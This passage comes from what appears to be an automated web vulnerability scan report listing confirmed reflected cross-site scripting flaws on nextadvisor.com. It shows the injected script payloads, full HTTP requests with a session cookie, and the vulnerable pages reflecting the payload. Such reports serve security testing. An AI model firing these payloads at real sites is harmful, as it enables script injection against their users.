background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Backup & Cloud Storage:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_backup_services"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
href="/link.php?kw=..
- /online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E

/online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000288)</script>

Request

GET /online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_backup_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6695
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", best online backup, online backup, file backup, hard drive backup, Carbonite, Mozy, SugarSync, IDrive, ElephantDrive, Norton Online Backup, IBackup" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_backup_services/index.php'"--></style></script><script>netsparker(0x000288)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content 
Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000288)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="/online_backup_services/compare_mac.php">Mac Online Backup</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub 
Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_backup_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Backup & Cloud Storage FAQ</h1> <p>Frequently Asked Questions about Online Backup & Cloud Storage</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Backup & Cloud Storage:</strong></p></span> <form 
action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_backup_services"> <input type="hidden" name="FieldData4" 
..
- /online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A7)%3C/script%3E

/online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A7)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x0002A7)</script>

Request

GET /online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_college/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:07 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7101
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online college, online colleges, online college reviews, compare online colleges, online college degree, online degrees, best online colleges, online schools review, online university reviews, compare online university, online universities, online education, e-learning, AIU Online, Capella University, Kaplan University, Walden University, Western Governors University, DeVry University, Westwood College, Colorado Technical University, South University, Liberty University" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_college/'"--></style></script><script>netsparker(0x0002A7)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> 
<div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option 
value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002A7)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="/online_college/compare.php">All Degrees</a> <span class="nav_border">|</span> <a href="compare_business.php">Business Degrees</a> <span class="nav_border">|</span> <a href="compare_nursing.php">Nursing Degrees</a> <span class="nav_border">|</span> <a href="financial_aid.php">Financial Aid</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a> <span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input 
type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_college_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online 
College Reviews FAQ</h1> <p>Frequently Asked Questions about Online College Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online College Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_college"> <input type="hidden" name="FieldData4" 
..
- /online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AA)%3C/script%3E

/online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enet..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x0002AA)</script>

Request

GET /online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_college/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7118
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online college, online colleges, online college reviews, compare online colleges, online college degree, online degrees, best online colleges, online schools review, online university reviews, compare online university, online universities, online education, e-learning, AIU Online, Capella University, Kaplan University, Walden University, Western Governors University, DeVry University, Westwood College, Colorado Technical University, South University, Liberty University" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_college/index.php'"--></style></script><script>netsparker(0x0002AA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div 
id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> 
<option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002AA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="/online_college/compare.php">All Degrees</a> <span class="nav_border">|</span> <a href="compare_business.php">Business Degrees</a> <span class="nav_border">|</span> <a href="compare_nursing.php">Nursing Degrees</a> <span class="nav_border">|</span> <a href="financial_aid.php">Financial Aid</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a> <span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" 
size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_college_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 
